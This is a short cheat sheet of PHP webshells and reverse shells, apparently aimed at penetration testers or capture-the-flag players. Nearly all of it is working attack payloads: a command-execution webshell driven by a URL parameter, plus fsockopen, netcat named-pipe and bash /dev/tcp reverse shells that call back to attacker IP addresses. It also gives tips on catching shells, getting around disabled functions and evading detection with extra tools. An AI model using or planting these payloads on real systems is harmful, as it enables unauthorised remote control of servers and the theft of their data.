This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios.

1. Basic Webshell Using system()

<?php system($_GET['cmd']); ?>

• Usage: Execute commands by passing cmd parameter in URL.
• Example: http://target.com/webshell.php?cmd=ls

2. PHP Reverse Shell Using One-liner with fsockopen()

php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");'

• Run this on target if you can execute PHP code directly.
• Connects back to your listener on port 3232.

3. PHP Reverse Shell Using Named Pipe & Netcat

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?>

• Uses a named pipe (/tmp/f) for stable reverse shell.
• Requires nc (Netcat) on the target machine.

4. PHP One-liner Bash Reverse Shell (Backgrounded)

<?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?>

• Runs bash reverse shell in the background.
• Useful to keep shell persistent after HTTP request ends.

🔥 Tips & Notes

• Replace IP and ports with your attacker machine’s IP and desired port.
• Use nc -lvnp <port> on your machine to catch the reverse shell.
• Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()).
• If nc is not installed on the target, try pure PHP or bash based shells.
• Always check if the web server user has permissions to execute commands or create named pipes.
• Combine these shells with Chankro or php-reverse-shell for better evasion.